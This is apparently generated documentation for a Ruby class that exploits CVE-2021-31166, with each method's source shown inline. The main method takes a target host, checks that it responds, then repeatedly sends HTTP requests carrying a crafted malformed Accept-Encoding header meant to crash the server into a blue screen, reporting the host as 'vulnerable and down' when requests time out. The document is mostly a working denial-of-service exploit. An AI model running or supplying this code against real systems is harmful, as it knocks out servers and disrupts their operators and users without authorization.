class CVE202131166
This class implements methods to exploit the CVE-2021-31166 for a DOS (Denial of Service) attack (Blue Screen) with ruby.
Public Class Methods
check_up(request, uri)
click to toggle source
This function checks the target state
# File CVE-2021-31166.rb, line 90 def self.check_up(request, uri) res = Net::HTTP.start( uri.hostname, uri.port, read_timeout: 60, open_timeout: 60, use_ssl: uri.scheme == 'https' ) { |http| http.request(request) } rescue Net::OpenTimeout, Errno::ETIMEDOUT, SocketError puts '[!] This host is probably inaccessible' 2 else nil end
get_stdin_host()
click to toggle source
This function gets target host from the STDIN
# File CVE-2021-31166.rb, line 82 def self.get_stdin_host print 'Host (target): ' gets.strip end
main()
click to toggle source
The main function to launch the attack
# File CVE-2021-31166.rb, line 107 def self.main host = ARGV[0] || get_stdin_host uri = URI("http://#{host}") request = Net::HTTP::Get.new(uri) access_error = check_up(request, uri) return access_error if access_error request['Accept-Encoding'] = "#{rand(1..7).times.map do (0...(rand(2..5))).map do ('a'..'z').to_a[rand(26)] end.join end.join(', ')}, ," vulnerable = false 10.times do Net::HTTP.start( uri.hostname, uri.port, read_timeout: 10, open_timeout: 10, use_ssl: uri.scheme == 'https' ) { |http| http.request(request) } rescue Net::OpenTimeout, Errno::ETIMEDOUT vulnerable = true break end if vulnerable puts "[+] Target: #{host} is vulnerable and down." 0 else puts "[-] Target: #{host} is not vulnerable and up." 1 end end